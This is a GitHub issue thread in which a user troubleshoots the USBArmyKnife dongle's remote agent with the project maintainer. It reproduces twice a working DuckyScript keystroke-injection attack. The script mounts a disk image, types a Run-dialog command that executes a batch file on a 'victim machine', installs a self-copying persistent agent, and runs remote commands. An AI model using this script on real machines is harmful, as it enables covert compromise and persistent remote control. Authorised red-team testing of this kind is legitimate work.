i-am-shodan/USBArmyKnife #164: Agent doesnt working? I don't know what else to try

Marcejr117, 2025-05-22:
## Your problem

I've spent 3 days trying to get the "agent" to work, but there's just no way.

- I've tried flashing the chip both from the web and using VS Code (both completed successfully).
- Scripts like "RickRoll" work perfectly, as does the web interface.
- I’ve created the image in two different ways: using the GitHub Actions files and compiling them myself. Afterwards, I followed the steps to build the "agent.img" as described in the README.md, and had no issues doing so.
- My keyboard is set to English (United States).
- My SD contains the 16MB "agent.img" and the "us_autorun.ds" (renamed to "audorun.ds").
- I had to modify the .ds script because the functions "WAIT_FOR_USB_STORAGE_ACTIVITY" and "WAIT_FOR_USB_STORAGE_ACTIVITY_TO_STOP" were causing the device to freeze and enter a loop (connecting and disconnecting), so I manually added DELAYs.
- Once the script was modified, everything seemed to go “fine”—the .img mounts and the keystrokes are executed without syntax issues.
- I have the script running on my machine (rundll32), and the ".dll" files are in the correct path.
- And despite all that, I still can’t use "VNC" or execute commands from the agent.

I've read all the documentation, and I saw that some people fixed this by blowing the eFuses. I haven’t done that yet, since I believe my device is working fine (it’s detected as a keyboard and as a serial device).

P.S.: This is my first time asking for help in a GitHub "issues" section—I hope this is the right way to do it. Thanks a lot!

## Your device

```txt
 LilyGo T-Dongle S3
```

# Language (HID attacks only)

  What language is your device configured to use?: Default
  What keyboard layout is your victim machine using?: ENG (estados unidos)

## Your DuckyScript

```yaml
REM To run this, you first need to create a disk image which contains the agent
REM Follow tools/README.md for instructions
REM Make sure the disk image is named agent.img you put it on the SD card

LOG UK agent script

DEFINE #FILE /agentInstalled

REM Only install the agent if this is the first machine we've been plugged into
IF (FILE_EXISTS() == FALSE) THEN
  LOG agentInstalled file does NOT exist
  LOG Installing agent
  USB_MOUNT_DISK_READ_ONLY /agent.img

  REM WAIT_FOR_USB_STORAGE_ACTIVITY
  REM Make sure we leave enough time for the drive box to appear
  DELAY 5000

  REM Searches each drive for a file name in1.bat. Run it if found

  LOG Performing HID attack
  REM Open Run window
  GUI R
  DELAY 1000

  REM To run we tell the agent the VID and PID of this device. That way it knows exactly what device to talk to
  REM The interpreter injects some 'constants' like #_VID_ and #_PID_.
  REM This is to keep compatibility with DuckyScript3 but allows us to have dynamic variables we can use in our attack
  STRING cmd /c @echo off & for %d in (F G H) do if exist %d:\in1.bat %d:\in1.bat #_VID_ #_PID_
  ENTER
  
  LOG HID attack complete
  LOG Didnt see key presses? Check wiki for efuse instructions

  REM The script needs time from Windows to actually start
  DELAY 1000
  REM Wait for the files to be copied to the right place and a task created
  REM WAIT_FOR_USB_STORAGE_ACTIVITY_TO_STOP
  DELAY 2000

  REM At this point the agent will copy itself somewhere safe and rerun itself
  REM we can wait until it connects

  CREATE_FILE()

  REM By resetting we can make the USB drive go away
  RESET
END_IF

LOG Waiting for agent to respond
WHILE (AGENT_CONNECTED() == FALSE)
  DELAY 2000
END_WHILE

LOG Agent responded
REM run a command, to see the results check the log over WiFi
AGENT_RUN dir
```

## Your debug logs

I insert the USB.
[image]

After the device restarts.

[image]
[image]

Now i open (`get_device_debug_output.ps1`) And I run a command from the agent section in the web UI.

[image]

[image]

And the agent is supposed to be connected.

[image]

# Device Images

[image]
[image]

- I confirm I have read the FAQ: yes
- I confirm I am using the latest release: yes

- My version number is: [c18a211](https://github.com/i-am-shodan/USBArmyKnife/commit/c18a211f8ed36b41f8139dae441c554a97827777)

i-am-shodan, 2025-05-22:
Firstly it looks like you are very close. You also need to remember that if get_device_debug_output.ps1 is running then the agent won't be able to connect.

Can you:
1. Stop get_device_debug_output.ps1
2. Un plug the device
3. Plug the device in
4. Wait 1m
5. Connect to the device and show the debug logs

What I'm expect to see is the log message 'Agent responded with status' this will tell me if the agent has been installed correctly.

Marcejr117, 2025-05-22:
> Firstly it looks like you are very close. You also need to remember that if get_device_debug_output.ps1 is running then the agent won't be able to connect.
>
> Can you:
>
> 1. Stop [...]

After completing all the steps and finally reopening "get_device_debug_output.ps1" to check the logs (final step), I still get the same message, and I’m still unable to use VNC or any command that requires the agent.

[image]

In the web UI (once I've closed "get_device_debug_output.ps1"):
[image]

Did I follow the steps correctly?
Thx for replying <3

i-am-shodan, 2025-05-22:
No, why did you run get_device_debug_output.ps1? I just wanted the screenshot of the logs tab in the UI.

For the agent to work I don't want you to ever run get_device_debug_output.ps1 again.

Marcejr117, 2025-05-23:
I think it’s working now. It was just a matter of leaving it for a bit longer and also increasing the script delay to give it enough time to copy all the files.

```yaml
REM To run this, you first need to create a disk image which contains the agent
REM Follow tools/README.md for instructions
REM Make sure the disk image is named agent.img you put it on the SD card

LOG UK agent script

DEFINE #FILE /agentInstalled

REM Only install the agent if this is the first machine we've been plugged into
IF (FILE_EXISTS() == FALSE) THEN
  LOG agentInstalled file does NOT exist
  LOG Installing agent
  USB_MOUNT_DISK_READ_ONLY /agent.img

  REM WAIT_FOR_USB_STORAGE_ACTIVITY
  REM Make sure we leave enough time for the drive box to appear
  DELAY 5000

  REM Searches each drive for a file name in1.bat. Run it if found

  LOG Performing HID attack
  REM Open Run window
  GUI R
  DELAY 1000

  REM To run we tell the agent the VID and PID of this device. That way it knows exactly what device to talk to
  REM The interpreter injects some 'constants' like #_VID_ and #_PID_.
  REM This is to keep compatibility with DuckyScript3 but allows us to have dynamic variables we can use in our attack
  STRING cmd /c @echo off & for %d in (F G H I) do if exist %d:\in1.bat %d:\in1.bat #_VID_ #_PID_
  ENTER
  
  LOG HID attack complete
  LOG Didnt see key presses? Check wiki for efuse instructions

  REM The script needs time from Windows to actually start
  DELAY 5000
  REM Wait for the files to be copied to the right place and a task created
  REM WAIT_FOR_USB_STORAGE_ACTIVITY_TO_STOP
  DELAY 5000

  REM At this point the agent will copy itself somewhere safe and rerun itself
  REM we can wait until it connects

  CREATE_FILE()

  REM By resetting we can make the USB drive go away
  RESET
END_IF

LOG Waiting for agent to respond
WHILE (AGENT_CONNECTED() == FALSE)
  DELAY 10000
END_WHILE

LOG Agent responded
REM run a command, to see the results check the log over WiFi
AGENT_RUN dir
```
[image]

However, I still don’t know why the commands "WAIT_FOR_USB_STORAGE_ACTIVITY" and "WAIT_FOR_USB_STORAGE_ACTIVITY_TO_STOP" cause my device to disconnect, breaking the copy process and entering a loop of connecting and disconnecting.

closed 2025-06-27 by i-am-shodan